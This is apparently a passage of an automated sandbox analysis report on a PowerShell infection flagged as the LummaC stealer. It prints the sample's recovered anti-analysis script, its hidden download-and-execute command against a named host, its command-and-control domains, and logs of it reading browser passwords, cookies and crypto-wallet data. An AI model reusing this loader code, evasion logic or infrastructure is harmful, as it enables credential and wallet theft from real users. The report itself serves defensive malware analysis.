                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HOOKEXPLORER.EXE
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AUTORUNSC.EXE
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: REGMON.EXE
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS -FILEPATH "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-NOPROFILE -EXECUTIONPOLICY BYPASS -COMMAND & {IEX ((NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://CDN1.KLIPBAZYXUI.SHOP/SINGL5.CSX'))}" -WINDOWSTYLE HIDDEN;$BXAK = $ENV:APPDATA;FUNCTION HLVO($YMAS, $LPJV){[IO.FILE]::WRITEALLBYTES($LPJV, (NEW-OBJECT (STNMR $QJXMK.SUBSTRING(103,26))).DOWNLOADDATA($YMAS))};FUNCTION STNMR($THTBI){RETURN (($THTBI -SPLIT '(?<=\G..)'|%{$QJXMK.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION THTBI(){FUNCTION SNDA($BXON){IF(!(TEST-PATH -PATH $LPJV)){HLVO (STNMR $BXON) $LPJV}}}THTBI;
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IDAQ.EXE
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IEX.SDG~%NZIZMMQSQVPX_A@A9CRNKT6J4M21LTKS7D0Q/FH8PP(JEOB#D.OEIJU"8P1_;:EYCB5H*-F%Y1\)LD1RO}3{V/IGWUXNZW06572700996852233492682527FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS | WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS -FILEPATH "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -ARGUMENTLIST "-NOPROFILE -EXECUTIONPOLICY BYPASS -COMMAND & {IEX ((NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTPS://CDN1.KLIPBAZYXUI.SHOP/SINGL5.CSX'))}" -WINDOWSTYLE HIDDEN;$BXAK = $ENV:APPDATA;FUNCTION HLVO($YMAS, $LPJV){[IO.FILE]::WRITEALLBYTES($LPJV, (NEW-OBJECT (STNMR $QJXMK.SUBSTRING(103,26))).DOWNLOADDATA($YMAS))};FUNCTION STNMR($THTBI){RETURN (($THTBI -SPLIT '(?<=\G..)'|%{$QJXMK.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION THTBI(){FUNCTION SNDA($BXON){IF(!(TEST-PATH -PATH $LPJV)){HLVO (STNMR $BXON) $LPJV}}}THTBI;P
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5322Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4231Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4014Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5795Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6380Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D02A60 GetSystemInfo,2_2_06D02A60
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 00000008.00000002.2634338427.0000000003095000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWQ
                  Source: powershell.exe, 00000008.00000002.2633114961.000000000305C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2634338427.0000000003095000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000002.00000002.2616078952.0000000007243000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI call chain: ExitProcess graph end nodegraph_8-14624
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043E110 LdrInitializeThunk,8_2_0043E110
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: amsi64_7432.amsi.csv, type: OTHER
                  Source: Yara matchFile source: amsi32_7792.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTR
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))}
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5AJump to behavior
                  LummaC encrypted strings found
                  Source: powershell.exeString found in binary or memory: hummskitnj.buzz
                  Source: powershell.exeString found in binary or memory: cashfuzysao.buzz
                  Source: powershell.exeString found in binary or memory: appliacnesot.buzz
                  Source: powershell.exeString found in binary or memory: screwamusresz.buzz
                  Source: powershell.exeString found in binary or memory: inherineau.buzz
                  Source: powershell.exeString found in binary or memory: scentniej.buzz
                  Source: powershell.exeString found in binary or memory: rebuildeso.buzz
                  Source: powershell.exeString found in binary or memory: prisonyfork.buzz
                  Source: powershell.exeString found in binary or memory: advicebedsu.click
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl5.csx'))} Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tcpview.exe
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Wireshark.exe
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lordpe.exe
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: procexp.exe
                  Source: powershell.exe, 00000008.00000002.2634338427.0000000003095000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Procmon.exe
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autoruns.exe
                  Source: powershell.exe, 00000000.00000002.1782702388.0000016DD09B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: regmon.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: powershell.exe, 00000008.00000002.2635830173.00000000030E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: allets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"W
                  Source: powershell.exe, 00000008.00000002.2635830173.00000000030E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash"
                  Source: powershell.exe, 00000008.00000002.2635830173.00000000030E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi,
                  Source: powershell.exe, 00000008.00000002.2634338427.0000000003095000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: powershell.exe, 00000008.00000002.2633114961.0000000003066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3-
                  Source: powershell.exe, 00000008.00000002.2634338427.0000000003095000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                  Source: powershell.exe, 00000000.00000002.1827046055.00007FFD9B9A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
